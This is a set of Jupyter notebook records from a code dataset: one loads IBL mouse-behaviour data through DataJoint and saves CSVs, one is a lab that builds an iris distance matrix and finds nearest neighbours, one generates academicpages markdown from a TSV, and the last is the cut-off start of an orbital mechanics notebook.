cb53a72d3653ebd23134b57f0a1db0c73c1d60c3 | 10,071 | ipynb | Jupyter Notebook | python/.ipynb_checkpoints/fetch_data_criteria-checkpoint.ipynb | int-brain-lab/ibl-changepoint | 84cc14dd212f1d21387d1259e9d7b41e96036e07 | [
"MIT"
] | 1 | 2020-07-23T13:39:38.000Z | 2020-07-23T13:39:38.000Z | python/.ipynb_checkpoints/fetch_data_criteria-checkpoint.ipynb | int-brain-lab/ibl-changepoint | 84cc14dd212f1d21387d1259e9d7b41e96036e07 | [
"MIT"
] | null | null | null | python/.ipynb_checkpoints/fetch_data_criteria-checkpoint.ipynb | int-brain-lab/ibl-changepoint | 84cc14dd212f1d21387d1259e9d7b41e96036e07 | [
"MIT"
] | null | null | null | 44.561947 | 711 | 0.586734 | [
[
[
"This script loads behavioral mice data (from `biasedChoiceWorld` protocol and, separately, the last three sessions of training) only from mice that pass a given (stricter) training criterion. For the `biasedChoiceWorld` protocol, only sessions achieving the `trained_1b` and `ready4ephysrig` training status are collected.\nThe data are slightly reformatted and saved as `.csv` files.",
"_____no_output_____"
]
],
[
[
"import datajoint as dj\ndj.config['database.host'] = 'datajoint.internationalbrainlab.org'\n\nfrom ibl_pipeline import subject, acquisition, action, behavior, reference, data\nfrom ibl_pipeline.analyses.behavior import PsychResults, SessionTrainingStatus\nfrom ibl_pipeline.utils import psychofit as psy\nfrom ibl_pipeline.analyses import behavior as behavior_analysis\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd",
"Connecting [email protected]:3306\n"
],
[
"import os\nmyPath = r\"C:\\Users\\Luigi\\Documents\\GitHub\\ibl-changepoint\\data\" # Write here your data path\nos.chdir(myPath)",
"_____no_output_____"
],
[
"# Get list of mice that satisfy given training criteria (stringent trained_1b)\n# Check query from behavioral paper: \n# https://github.com/int-brain-lab/paper-behavior/blob/master/paper_behavior_functions.py\n\nsubj_query = (subject.Subject * subject.SubjectLab * reference.Lab * subject.SubjectProject\n & 'subject_project = \"ibl_neuropixel_brainwide_01\"').aggr(\n (acquisition.Session * behavior_analysis.SessionTrainingStatus())\n# & 'training_status=\"trained_1a\" OR training_status=\"trained_1b\"',\n# & 'training_status=\"trained_1b\" OR training_status=\"ready4ephysrig\"',\n & 'training_status=\"trained_1b\"',\n 'subject_nickname', 'sex', 'subject_birth_date', 'institution',\n date_trained='min(date(session_start_time))')\n\nsubjects = (subj_query & 'date_trained < \"2019-09-30\"')\n\nmice_names = sorted(subjects.fetch('subject_nickname'))\n\nprint(mice_names)",
"['CSHL_002', 'CSHL_003', 'CSHL_005', 'CSHL_008', 'CSHL_010', 'CSHL_014', 'CSHL_015', 'CSH_ZAD_001', 'CSH_ZAD_003', 'CSH_ZAD_004', 'CSH_ZAD_006', 'CSH_ZAD_007', 'CSH_ZAD_010', 'DY_001', 'DY_006', 'DY_007', 'IBL-T1', 'IBL-T2', 'IBL-T4', 'IBL_001', 'IBL_002', 'KS002', 'KS003', 'KS004', 'KS005', 'KS014', 'KS015', 'KS016', 'KS017', 'KS019', 'NYU-01', 'NYU-02', 'NYU-06', 'SWC_009', 'SWC_013', 'SWC_014', 'ZM_1084', 'ZM_1085', 'ZM_1086', 'ZM_1087', 'ZM_1091', 'ZM_1092', 'ZM_1097', 'ZM_1098', 'ZM_1367', 'ZM_1371', 'ZM_1372', 'ZM_1743', 'ZM_1745', 'ZM_1746', 'ZM_1747', 'ibl_witten_03', 'ibl_witten_04', 'ibl_witten_05', 'ibl_witten_06', 'ibl_witten_12', 'ibl_witten_14', 'ibl_witten_15', 'ibl_witten_16']\n"
],
[
"sess_train = ((acquisition.Session * behavior_analysis.SessionTrainingStatus) & \n 'task_protocol LIKE \"%training%\"' & 'session_start_time < \"2019-09-30\"')\nsess_stable = ((acquisition.Session * behavior_analysis.SessionTrainingStatus) & \n 'task_protocol LIKE \"%biased%\"' & 'session_start_time < \"2019-09-30\"' & \n ('training_status=\"trained_1b\" OR training_status=\"ready4ephysrig\"'))\n \nstable_mice_names = list()\n\n# Perform at least this number of sessions\nMinSessionNumber = 4\n\ndef get_mouse_data(df):\n position_deg = 35. # Stimuli appear at +/- 35 degrees\n\n # Create new dataframe\n datamat = pd.DataFrame()\n datamat['trial_num'] = df['trial_id']\n datamat['session_num'] = np.cumsum(df['trial_id'] == 1)\n datamat['stim_probability_left'] = df['trial_stim_prob_left']\n signed_contrast = df['trial_stim_contrast_right'] - df['trial_stim_contrast_left']\n datamat['contrast'] = np.abs(signed_contrast)\n datamat['position'] = np.sign(signed_contrast)*position_deg\n datamat['response_choice'] = df['trial_response_choice']\n datamat.loc[df['trial_response_choice'] == 'CCW','response_choice'] = 1\n datamat.loc[df['trial_response_choice'] == 'CW','response_choice'] = -1\n datamat.loc[df['trial_response_choice'] == 'No Go','response_choice'] = 0\n datamat['trial_correct'] = np.double(df['trial_feedback_type']==1)\n datamat['reaction_time'] = df['trial_response_time'] - df['trial_stim_on_time'] # double-check\n\n # Since some trials have zero contrast, need to compute the alleged position separately\n datamat.loc[(datamat['trial_correct'] == 1) & (signed_contrast == 0),'position'] = \\\n datamat.loc[(datamat['trial_correct'] == 1) & (signed_contrast == 0),'response_choice']*position_deg\n datamat.loc[(datamat['trial_correct'] == 0) & (signed_contrast == 0),'position'] = \\\n datamat.loc[(datamat['trial_correct'] == 0) & (signed_contrast == 0),'response_choice']*(-position_deg)\n \n return datamat",
"_____no_output_____"
],
[
"# Loop over all mice\nfor mouse_nickname in mice_names:\n \n mouse_subject = {'subject_nickname': mouse_nickname}\n \n # Get mouse data for biased sessions\n behavior_stable = (behavior.TrialSet.Trial & (subject.Subject & mouse_subject)) \\\n * sess_stable.proj('session_uuid','task_protocol','session_start_time','training_status') * subject.Subject.proj('subject_nickname') \\\n * subject.SubjectLab.proj('lab_name')\n df = pd.DataFrame(behavior_stable.fetch(order_by='subject_nickname, session_start_time, trial_id', as_dict=True))\n\n if len(df) > 0: # The mouse has performed in at least one stable session with biased blocks \n datamat = get_mouse_data(df)\n\n # Take mice that have performed a minimum number of sessions\n if np.max(datamat['session_num']) >= MinSessionNumber:\n\n # Should add 'N' to mice names that start with numbers?\n\n # Save dataframe to CSV file\n filename = mouse_nickname + '.csv'\n datamat.to_csv(filename,index=False)\n stable_mice_names.append(mouse_nickname)\n \n # Get mouse last sessions of training data\n behavior_train = (behavior.TrialSet.Trial & (subject.Subject & mouse_subject)) \\\n * sess_train.proj('session_uuid','task_protocol','session_start_time') * subject.Subject.proj('subject_nickname') \\\n * subject.SubjectLab.proj('lab_name')\n df_train = pd.DataFrame(behavior_train.fetch(order_by='subject_nickname, session_start_time, trial_id', as_dict=True))\n\n datamat_train = get_mouse_data(df_train)\n Nlast = np.max(datamat_train['session_num']) - 3\n datamat_final = datamat_train[datamat_train['session_num'] > Nlast]\n\n # Save final training dataframe to CSV file\n filename = mouse_nickname + '_endtrain.csv'\n datamat_final.to_csv(filename,index=False)\n \n\nprint(stable_mice_names)",
"['CSHL_002', 'CSHL_003', 'CSHL_005', 'CSHL_008', 'CSHL_010', 'CSHL_014', 'CSHL_015', 'CSH_ZAD_001', 'CSH_ZAD_003', 'CSH_ZAD_004', 'CSH_ZAD_006', 'CSH_ZAD_007', 'CSH_ZAD_010', 'DY_001', 'DY_007', 'IBL-T1', 'IBL-T2', 'IBL-T4', 'IBL_001', 'IBL_002', 'KS002', 'KS003', 'KS004', 'KS005', 'KS014', 'KS015', 'KS016', 'KS017', 'NYU-01', 'NYU-02', 'NYU-06', 'SWC_013', 'ZM_1084', 'ZM_1085', 'ZM_1086', 'ZM_1087', 'ZM_1091', 'ZM_1092', 'ZM_1097', 'ZM_1098', 'ZM_1367', 'ZM_1371', 'ZM_1372', 'ZM_1743', 'ZM_1745', 'ZM_1746', 'ibl_witten_04', 'ibl_witten_05', 'ibl_witten_06', 'ibl_witten_12', 'ibl_witten_14', 'ibl_witten_15', 'ibl_witten_16']\n"
],
[
"len(stable_mice_names)",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb53a7d99a6719913de8b4809a8f5f260415c8dc | 977,968 | ipynb | Jupyter Notebook | notebooks/lab02_close_neighbors.ipynb | tiago-oom/Data-Mining-21-22 | eb250df37511ca1d2547be098ed477ba7f5996e9 | [
"MIT"
] | null | null | null | notebooks/lab02_close_neighbors.ipynb | tiago-oom/Data-Mining-21-22 | eb250df37511ca1d2547be098ed477ba7f5996e9 | [
"MIT"
] | null | null | null | notebooks/lab02_close_neighbors.ipynb | tiago-oom/Data-Mining-21-22 | eb250df37511ca1d2547be098ed477ba7f5996e9 | [
"MIT"
] | null | null | null | 42.032406 | 99,544 | 0.613784 | [
[
[
"# Distance Matrix",
"_____no_output_____"
]
],
[
[
"# imports\n# The sklearn library contains a lot of efficient tools for machine learning and statistical modeling including \n # classification, regression, clustering and dimensionality reduction\nfrom sklearn import datasets\n# used to perform a wide variety of mathematical operations on arrays. It adds powerful data structures to Python \n # that guarantee efficient calculations with arrays and matrices\nimport numpy as np",
"_____no_output_____"
],
[
"# abstract\ndataset = datasets.load_iris()",
"_____no_output_____"
],
[
"# dictionary\ndataset.keys()",
"_____no_output_____"
],
[
"dataset[\"feature_names\"]",
"_____no_output_____"
],
[
"data = dataset[\"data\"]\n# data is a numpy array data structure. Think of it as a matrix of data (or as an excel spreadsheet)",
"_____no_output_____"
],
[
"print(data.shape)\nprint(data)",
"(150, 4)\n[[5.1 3.5 1.4 0.2]\n [4.9 3. 1.4 0.2]\n [4.7 3.2 1.3 0.2]\n [4.6 3.1 1.5 0.2]\n [5. 3.6 1.4 0.2]\n [5.4 3.9 1.7 0.4]\n [4.6 3.4 1.4 0.3]\n [5. 3.4 1.5 0.2]\n [4.4 2.9 1.4 0.2]\n [4.9 3.1 1.5 0.1]\n [5.4 3.7 1.5 0.2]\n [4.8 3.4 1.6 0.2]\n [4.8 3. 1.4 0.1]\n [4.3 3. 1.1 0.1]\n [5.8 4. 1.2 0.2]\n [5.7 4.4 1.5 0.4]\n [5.4 3.9 1.3 0.4]\n [5.1 3.5 1.4 0.3]\n [5.7 3.8 1.7 0.3]\n [5.1 3.8 1.5 0.3]\n [5.4 3.4 1.7 0.2]\n [5.1 3.7 1.5 0.4]\n [4.6 3.6 1. 0.2]\n [5.1 3.3 1.7 0.5]\n [4.8 3.4 1.9 0.2]\n [5. 3. 1.6 0.2]\n [5. 3.4 1.6 0.4]\n [5.2 3.5 1.5 0.2]\n [5.2 3.4 1.4 0.2]\n [4.7 3.2 1.6 0.2]\n [4.8 3.1 1.6 0.2]\n [5.4 3.4 1.5 0.4]\n [5.2 4.1 1.5 0.1]\n [5.5 4.2 1.4 0.2]\n [4.9 3.1 1.5 0.2]\n [5. 3.2 1.2 0.2]\n [5.5 3.5 1.3 0.2]\n [4.9 3.6 1.4 0.1]\n [4.4 3. 1.3 0.2]\n [5.1 3.4 1.5 0.2]\n [5. 3.5 1.3 0.3]\n [4.5 2.3 1.3 0.3]\n [4.4 3.2 1.3 0.2]\n [5. 3.5 1.6 0.6]\n [5.1 3.8 1.9 0.4]\n [4.8 3. 1.4 0.3]\n [5.1 3.8 1.6 0.2]\n [4.6 3.2 1.4 0.2]\n [5.3 3.7 1.5 0.2]\n [5. 3.3 1.4 0.2]\n [7. 3.2 4.7 1.4]\n [6.4 3.2 4.5 1.5]\n [6.9 3.1 4.9 1.5]\n [5.5 2.3 4. 1.3]\n [6.5 2.8 4.6 1.5]\n [5.7 2.8 4.5 1.3]\n [6.3 3.3 4.7 1.6]\n [4.9 2.4 3.3 1. ]\n [6.6 2.9 4.6 1.3]\n [5.2 2.7 3.9 1.4]\n [5. 2. 3.5 1. ]\n [5.9 3. 4.2 1.5]\n [6. 2.2 4. 1. ]\n [6.1 2.9 4.7 1.4]\n [5.6 2.9 3.6 1.3]\n [6.7 3.1 4.4 1.4]\n [5.6 3. 4.5 1.5]\n [5.8 2.7 4.1 1. ]\n [6.2 2.2 4.5 1.5]\n [5.6 2.5 3.9 1.1]\n [5.9 3.2 4.8 1.8]\n [6.1 2.8 4. 1.3]\n [6.3 2.5 4.9 1.5]\n [6.1 2.8 4.7 1.2]\n [6.4 2.9 4.3 1.3]\n [6.6 3. 4.4 1.4]\n [6.8 2.8 4.8 1.4]\n [6.7 3. 5. 1.7]\n [6. 2.9 4.5 1.5]\n [5.7 2.6 3.5 1. ]\n [5.5 2.4 3.8 1.1]\n [5.5 2.4 3.7 1. ]\n [5.8 2.7 3.9 1.2]\n [6. 2.7 5.1 1.6]\n [5.4 3. 4.5 1.5]\n [6. 3.4 4.5 1.6]\n [6.7 3.1 4.7 1.5]\n [6.3 2.3 4.4 1.3]\n [5.6 3. 4.1 1.3]\n [5.5 2.5 4. 1.3]\n [5.5 2.6 4.4 1.2]\n [6.1 3. 4.6 1.4]\n [5.8 2.6 4. 1.2]\n [5. 2.3 3.3 1. ]\n [5.6 2.7 4.2 1.3]\n [5.7 3. 4.2 1.2]\n [5.7 2.9 4.2 1.3]\n [6.2 2.9 4.3 1.3]\n [5.1 2.5 3. 1.1]\n [5.7 2.8 4.1 1.3]\n [6.3 3.3 6. 2.5]\n [5.8 2.7 5.1 1.9]\n [7.1 3. 5.9 2.1]\n [6.3 2.9 5.6 1.8]\n [6.5 3. 5.8 2.2]\n [7.6 3. 6.6 2.1]\n [4.9 2.5 4.5 1.7]\n [7.3 2.9 6.3 1.8]\n [6.7 2.5 5.8 1.8]\n [7.2 3.6 6.1 2.5]\n [6.5 3.2 5.1 2. ]\n [6.4 2.7 5.3 1.9]\n [6.8 3. 5.5 2.1]\n [5.7 2.5 5. 2. ]\n [5.8 2.8 5.1 2.4]\n [6.4 3.2 5.3 2.3]\n [6.5 3. 5.5 1.8]\n [7.7 3.8 6.7 2.2]\n [7.7 2.6 6.9 2.3]\n [6. 2.2 5. 1.5]\n [6.9 3.2 5.7 2.3]\n [5.6 2.8 4.9 2. ]\n [7.7 2.8 6.7 2. ]\n [6.3 2.7 4.9 1.8]\n [6.7 3.3 5.7 2.1]\n [7.2 3.2 6. 1.8]\n [6.2 2.8 4.8 1.8]\n [6.1 3. 4.9 1.8]\n [6.4 2.8 5.6 2.1]\n [7.2 3. 5.8 1.6]\n [7.4 2.8 6.1 1.9]\n [7.9 3.8 6.4 2. ]\n [6.4 2.8 5.6 2.2]\n [6.3 2.8 5.1 1.5]\n [6.1 2.6 5.6 1.4]\n [7.7 3. 6.1 2.3]\n [6.3 3.4 5.6 2.4]\n [6.4 3.1 5.5 1.8]\n [6. 3. 4.8 1.8]\n [6.9 3.1 5.4 2.1]\n [6.7 3.1 5.6 2.4]\n [6.9 3.1 5.1 2.3]\n [5.8 2.7 5.1 1.9]\n [6.8 3.2 5.9 2.3]\n [6.7 3.3 5.7 2.5]\n [6.7 3. 5.2 2.3]\n [6.3 2.5 5. 1.9]\n [6.5 3. 5.2 2. ]\n [6.2 3.4 5.4 2.3]\n [5.9 3. 5.1 1.8]]\n"
],
[
"# euclidean distance of 2 observations\np1 = data[50]\np2 = data[100]\nsum(((p1 - p2)**2))**(1/2)",
"_____no_output_____"
],
[
"# initialize distance matrix. What will be its final shape?\ndist = []",
"_____no_output_____"
],
[
"# Build the distance matrix. Use 2 for loops, the append list method and the euclidean distance formula\n\n# Iterates throw the number of lines in data\nfor i in range(data.shape[0]):\n \n dist_row = []\n \n # Iterates throw the number of lines in data\n for j in range(data.shape[0]):\n \n single_dist = sum((data[i] - data[j]) ** 2) ** (1/2)\n # Append the results to dist_row\n dist_row.append(single_dist)\n \n # At the end of the second loop, append list to matrix dist\n dist.append(dist_row) ",
"_____no_output_____"
],
[
"dist",
"_____no_output_____"
],
[
"# another import (usually all imports are done at the top of the script/ notebook)\n# Open-source Python library built on top of matplotlib. It is used for data visualization and exploratory data analysis. \n # Seaborn works easily with dataframes and the Pandas library.\nimport seaborn as sns",
"_____no_output_____"
],
[
"sns.heatmap(dist)",
"_____no_output_____"
]
],
[
[
"# Plotting data: \nDon't worry about the code as that's not the objective of the exercise and we will learn how to plot data in future classes\n### How can we represent an observation in a N-dimensional Space",
"_____no_output_____"
]
],
[
[
"# plotting library available for the Python programming language as a component of NumPy, \n #a big data numerical handling resource. Matplotlib uses an object oriented API to embed plots in Python applications\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"# 2D scatter plot\nplt.scatter(data[:, 0], data[:, 1])\n\n# Eixo x: sepal length\nplt.xlabel(dataset[\"feature_names\"][0])\n# Eixo y: sepal width\nplt.ylabel(dataset[\"feature_names\"][1])\n# Show plot\nplt.show()",
"_____no_output_____"
],
[
"# 1D scatter plot\nplt.scatter(data[:, 0], [0 for i in range(data.shape[0])])\n\n# Eixo x: sepal length\nplt.xlabel(dataset[\"feature_names\"][0])\n\nplt.show()",
"_____no_output_____"
],
[
"# 3D scatter plot\n\n\nfig = plt.figure(figsize=(14, 7)) # defining a figure so we can add a 3d subplot\n# figsize=Width, height in inches\n\n# Used to add an Axes to the figure as part of a subplot arrangement\nax = fig.add_subplot(111, projection=\"3d\")\n\n\n# 3 columns = 3 dimensions\nax.scatter(data[:, 0], data[:, 1], data[:, 2])\n\n# Labelling the axes\nax.set_xlabel(dataset[\"feature_names\"][0])\nax.set_ylabel(dataset[\"feature_names\"][1])\nax.set_zlabel(dataset[\"feature_names\"][2])\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Finding nearest neighbors",
"_____no_output_____"
]
],
[
[
"# Let's start off simple. If we want to find the minimum value we use the following code:\n\nmin_args, min_dist = (None, 9e99) # initialize these variables outside the loop so their scope is defined globally and we can update and track their values at each iteration.\n\nfor id_r, row in enumerate(dist): # enumerate to not only iterate along the rows of dist but also to keep track of the row index we are at: id_r\n dist_ = min(row) # minimum distance in the current row\n \n if dist_ <= min_dist:\n min_dist = dist_ # if the minimum distance of the row is <= the minimum global distance, then we update the later\n min_args = id_r # and we also are able to know at which row index we found the minimum global distance!",
"_____no_output_____"
],
[
"# Next step. Let's try to additionally find the column index responsible for the minimum global distance. \n# Then, together with the row index we can know which observations are closest together (i.e. have the smallest distance):\n\nmin_args, min_dist = (None, 9e99)\n\nfor id_r, row in enumerate(dist):\n \n dist_ = min(row)\n \n if dist_ <= min_dist:\n min_dist = dist_\n \n for id_c, dist_val in enumerate(row):\n \n if dist_val == dist_: # to find the column index responsible for the current minimum global distance we need to iterate along the current row distances and if at a given iteration we find that the corresponding distance is the same as the current minimum global distance, then we know that we the tracked column index id_c is the one responsible for the current minimum global distance\n min_args = (id_r, id_c)\n break # after finding the column index responsible for the current minimum global distance, we exit the loop as we don't need to search any longer",
"_____no_output_____"
],
[
"# The way we search for the minimum distance and the corresponding observations is explained. However we have to take care\n# of a very important detail. Since the distance matrix is a symmetric and 0-diagonal matrix (distance of the observation\n# with itself is 0) we should only perform the search over either the upper or lower traingle of the matrix. \n# Let's implement this:\n\nmin_args, min_dist = (None, 9e99)\n\nfor id_r, row in enumerate(dist):\n \n row_relevant = row.copy()[:id_r] # we define row_relevant as a copy of row that only holds a slice of the values corresponding to the distances in the lower diagonal of the matrix (i.e. excludes value in row corresponding to diagonal and upper triangle as it holds redundant information). We will only look for the minimum distance and the corresponding observations in these values\n dist_ = min(row_relevant) if len(row_relevant)>0 else 9e99 # the if condition ensures we do not call the min() function on an empty list (happens at first iteration when id_r = 0)\n \n if dist_<=min_dist:\n min_dist = dist_\n \n for id_c, dist_val in enumerate(row_relevant):\n if dist_val == dist_:\n min_args = (id_r, id_c)\n break\n\n",
"_____no_output_____"
],
[
"min_dist",
"_____no_output_____"
],
[
"min_args",
"_____no_output_____"
],
[
"print(data[min_args[0]])\nprint(data[min_args[1]])\nprint('minimum distance:\\t', min_dist)",
"[5.8 2.7 5.1 1.9]\n[5.8 2.7 5.1 1.9]\nminimum distance:\t 0.0\n"
]
],
[
[
"## Define functions\nWhy do we want to define functions in this case?",
"_____no_output_____"
]
],
[
[
"def distance_matrix(data):\n dist = []\n # Build the distance matrix. Use 2 for loops, the append list method and the euclidean distance formula\n for i in range(data.shape[0]):\n dist_row = []\n for j in range(data.shape[0]):\n single_dist = sum((data[i] - data[j]) ** 2) ** 1/2\n dist_row.append(single_dist)\n dist.append(dist_row) \n return dist \n\ndef closest_points(dist_matrix):\n # get variables to save closest neighbors later\n min_args, min_dist = (None, 9e99)\n for id_r, row in enumerate(dist_matrix):\n row_ = row.copy()[:id_r]\n dist = min(row_) if len(row_)>0 else 9e99\n # check if the row's min distance is the lowest distance found so far\n if dist<=min_dist:\n # save points' ids and their distance\n min_dist = dist \n for id_diag, dist_val in enumerate(row_):\n if dist_val==dist:\n min_args = (id_diag, id_r)\n break\n return min_args, min_dist\n",
"_____no_output_____"
]
],
[
[
"## Finding the `n` shortest distances",
"_____no_output_____"
]
],
[
[
"dist_matrix = distance_matrix(data)\nn_distances = 10\n\ndistances = []\n\nfor _ in range(n_distances):\n \n # return min_args, min_dist\n c_points = closest_points(dist_matrix)\n \n # append to list distances\n distances.append(c_points)\n \n # Increasing shortest distance value to find the next shortest distance\n dist_matrix[c_points[0][1]][c_points[0][0]] = 9e99 \n\ndistances",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb53ad65ad7b0a874860d83fe2a42077adbd677e | 14,369 | ipynb | Jupyter Notebook | markdown_generator/.ipynb_checkpoints/publications-checkpoint.ipynb | pbrimble/pbrimble.github.io | f84827d3fd33d8ce95ec6ff99443ae56a03a2b2a | [
"MIT"
] | null | null | null | markdown_generator/.ipynb_checkpoints/publications-checkpoint.ipynb | pbrimble/pbrimble.github.io | f84827d3fd33d8ce95ec6ff99443ae56a03a2b2a | [
"MIT"
] | null | null | null | markdown_generator/.ipynb_checkpoints/publications-checkpoint.ipynb | pbrimble/pbrimble.github.io | f84827d3fd33d8ce95ec6ff99443ae56a03a2b2a | [
"MIT"
] | null | null | null | 37.129199 | 448 | 0.522444 | [
[
[
"# Publications markdown generator for academicpages\n\nTakes a TSV of publications with metadata and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook ([see more info here](http://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html)). The core python code is also in `publications.py`. Run either from the `markdown_generator` folder after replacing `publications.tsv` with one containing your data.\n\nTODO: Make this work with BibTex and other databases of citations, rather than Stuart's non-standard TSV format and citation style.\n",
"_____no_output_____"
],
[
"## Data format\n\nThe TSV needs to have the following columns: pub_date, title, venue, excerpt, citation, site_url, and paper_url, with a header at the top. \n\n- `excerpt` and `paper_url` can be blank, but the others must have values. \n- `pub_date` must be formatted as YYYY-MM-DD.\n- `url_slug` will be the descriptive part of the .md file and the permalink URL for the page about the paper. The .md file will be `YYYY-MM-DD-[url_slug].md` and the permalink will be `https://[yourdomain]/publications/YYYY-MM-DD-[url_slug]`\n\nThis is how the raw file looks (it doesn't look pretty, use a spreadsheet or other program to edit and create).",
"_____no_output_____"
]
],
[
[
"!cat publications.tsv",
"pub_date\ttitle\tvenue\texcerpt\tcitation\turl_slug\tpaper_url\r\r\n01/10/2009\tPaper Title Number 1\tJournal 1\tThis paper is about the number 1. The number 2 is left for future work.\t\"<b>Your Name, You.</b> 2009. \"\"Paper Title Number 1.\"\" <i>Journal 1</i>. 1(1).\"\tpaper-title-number-1\thttp://academicpages.github.io/files/paper1.pdf\r\r\n01/10/2010\tPaper Title Number 2\tJournal 1\tThis paper is about the number 2. The number 3 is left for future work.\t\"<b>Your Name, You.</b> 2010. \"\"Paper Title Number 2.\"\" <i>Journal 1</i>. 1(2).\"\tpaper-title-number-2\thttp://academicpages.github.io/files/paper2.pdf\r\r\n01/10/2015\tPaper Title Number 3\tJournal 1\tThis paper is about the number 3. The number 4 is left for future work.\t\"<b>Your Name, You.</b> 2015. \"\"Paper Title Number 3.\"\" <i>Journal 1</i>. 1(3).\"\tpaper-title-number-3\thttp://academicpages.github.io/files/paper3.pdf\r\r\n02/10/2015\tPaper Title Number 4\tJournal 1\tThis paper is about the number 4. The number 4 is left for future work.\t\"<b>Your Name, You.</b> 2015. \"\"Paper Title Number 4.\"\" <i>Journal 1</i>. 1(4).\"\tpaper-title-number-4\thttp://academicpages.github.io/files/paper4.pdf "
]
],
[
[
"## Import pandas\n\nWe are using the very handy pandas library for dataframes.",
"_____no_output_____"
]
],
[
[
"import pandas as pd",
"_____no_output_____"
]
],
[
[
"## Import TSV\n\nPandas makes this easy with the read_csv function. We are using a TSV, so we specify the separator as a tab, or `\\t`.\n\nI found it important to put this data in a tab-separated values format, because there are a lot of commas in this kind of data and comma-separated values can get messed up. However, you can modify the import statement, as pandas also has read_excel(), read_json(), and others.",
"_____no_output_____"
]
],
[
[
"publications = pd.read_csv(\"publications.tsv\", sep=\"\\t\", header=0)\npublications\n",
"_____no_output_____"
]
],
[
[
"## Escape special characters\n\nYAML is very picky about how it takes a valid string, so we are replacing single and double quotes (and ampersands) with their HTML encoded equivilents. This makes them look not so readable in raw format, but they are parsed and rendered nicely.",
"_____no_output_____"
]
],
[
[
"html_escape_table = {\n \"&\": \"&\",\n '\"': \""\",\n \"'\": \"'\"\n }\n\ndef html_escape(text):\n \"\"\"Produce entities within text.\"\"\"\n return \"\".join(html_escape_table.get(c,c) for c in text)",
"_____no_output_____"
]
],
[
[
"## Creating the markdown files\n\nThis is where the heavy lifting is done. This loops through all the rows in the TSV dataframe, then starts to concatentate a big string (```md```) that contains the markdown for each type. It does the YAML metadata first, then does the description for the individual page.",
"_____no_output_____"
]
],
[
[
"import os\nfor row, item in publications.iterrows():\n \n md_filename = str(item.pub_date) + \"-\" + item.url_slug + \".md\"\n html_filename = str(item.pub_date) + \"-\" + item.url_slug\n year = item.pub_date[:4]\n \n ## YAML variables\n \n md = \"---\\ntitle: \\\"\" + item.title + '\"\\n'\n \n md += \"\"\"collection: publications\"\"\"\n \n md += \"\"\"\\npermalink: /publication/\"\"\" + html_filename\n \n if len(str(item.excerpt)) > 5:\n md += \"\\nexcerpt: '\" + html_escape(item.excerpt) + \"'\"\n \n md += \"\\ndate: \" + str(item.pub_date) \n \n md += \"\\nvenue: '\" + html_escape(item.venue) + \"'\"\n \n if len(str(item.paper_url)) > 5:\n md += \"\\npaperurl: '\" + item.paper_url + \"'\"\n \n md += \"\\ncitation: '\" + html_escape(item.citation) + \"'\"\n \n md += \"\\n---\"\n \n ## Markdown description for individual page\n \n if len(str(item.excerpt)) > 5:\n md += \"\\n\" + html_escape(item.excerpt) + \"\\n\"\n \n if len(str(item.paper_url)) > 5:\n md += \"\\n[Download paper here](\" + item.paper_url + \")\\n\" \n \n md += item.citation\n \n md_filename = os.path.basename(md_filename)\n \n with open(\"../_publications/\" + md_filename, 'w') as f:\n f.write(md)",
"_____no_output_____"
]
],
[
[
"These files are in the publications directory, one directory below where we're working from.",
"_____no_output_____"
]
],
[
[
"!ls ../_publications/",
"\u001b[31m2009-10-01-paper-title-number-1.md\u001b[m\u001b[m \u001b[31m2015-10-01-paper-title-number-3.md\u001b[m\u001b[m\r\n2009-paper-title-number-1.md 2015-paper-title-number-3.md\r\n\u001b[31m2010-10-01-paper-title-number-2.md\u001b[m\u001b[m 2015-paper-title-number-4.md\r\n2010-paper-title-number-2.md \u001b[31m2020-02-18-kigali-property-valuation.md\u001b[m\u001b[m\r\n"
],
[
"!cat ../_publications/2009-10-01-paper-title-number-1.md",
"---\r\ntitle: \"Paper Title Number 1\"\r\ncollection: publications\r\npermalink: /publication/2009-10-01-paper-title-number-1\r\nexcerpt: 'This paper is about the number 1. The number 2 is left for future work.'\r\ndate: 2009-10-01\r\nvenue: 'Journal 1'\r\npaperurl: 'http://academicpages.github.io/files/paper1.pdf'\r\ncitation: 'Your Name, You. (2009). "Paper Title Number 1." <i>Journal 1</i>. 1(1).'\r\n---\r\nThis paper is about the number 1. The number 2 is left for future work.\r\n\r\n[Download paper here](http://academicpages.github.io/files/paper1.pdf)\r\n\r\nRecommended citation: Your Name, You. (2009). \"Paper Title Number 1.\" <i>Journal 1</i>. 1(1)."
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb53b4f3ce1846b8abeb0ffb17717379c6b26319 | 84,219 | ipynb | Jupyter Notebook | orb_mech (2).ipynb | cjessop/yessir | d58dd172f03628a14f5e1c89e021e0c4498054c3 | [
"MIT"
] | null | null | null | orb_mech (2).ipynb | cjessop/yessir | d58dd172f03628a14f5e1c89e021e0c4498054c3 | [
"MIT"
] | null | null | null | orb_mech (2).ipynb | cjessop/yessir | d58dd172f03628a14f5e1c89e021e0c4498054c3 | [
"MIT"
] | null | null | null | 85.850153 | 25,848 | 0.791365 | [
[
[
"#!pip install jupyterthemes\n#!jt -t chesterish\n#!pip install autopep8",
"_____no_output_____"
],
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport tkinter as tk",
"_____no_output_____"
],
[
